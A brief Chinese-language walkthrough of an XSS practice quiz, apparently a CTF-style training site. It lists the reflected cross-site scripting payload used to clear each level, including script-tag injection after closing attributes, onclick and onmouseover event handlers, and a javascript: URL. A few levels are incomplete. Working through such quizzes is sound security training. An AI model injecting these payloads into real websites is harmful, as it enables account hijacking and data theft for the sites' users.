地址:http://xss-quiz.int21h.jp/?sid=02ece25c340e36666a2c09b99f0cf3a289d7adfe
1 第一关
直接输入输入playload就可以通过。
``<script>alert(document.domain)</script>
2 第二关
需要闭合一个标签,输入
"><script>alert(document.domain)</script>
第三关
这里是在此处进行插入
<script>alert(document.domain)</script>
第四关
抓包,通过p3提交
""><script>alert(document.domain)</script>
第五关
修改长度后输入ployed即可。
"><script>alert(document.domain)</script>
第六关
先输入 "> ,发现<>被过滤了。
换个思路,既然闭合不了那就加个属性:
" οnclick=alert(document.domain) id="a
第七关
输入ployload
" οnclick=alert(document.domain) id="a
可以出发弹窗,但这里的value和之前的不一样,是因为这里对"进行了过滤,所以"能出现在value后面。
第八关
提示使用JavaScript协议。
没有什么过滤,可以直接弹窗
javascript:alert(document.domain)
第九关
提示使用utf-7的编码来绕过,这里使用其他方式绕过。
简单粗暴直接绕过。
第十关
对domain进行了过滤,将它替换成了空字符,这里我们输入payload
">
第十二关
第十一关不知道为啥进不去。
啥也过滤了,不知道怎么搞。
上网查询后了解到,ie浏览器会把单引号识别为双引号
οnclick=alert(document.domain)
οnmοuseοver=alert(document.domain);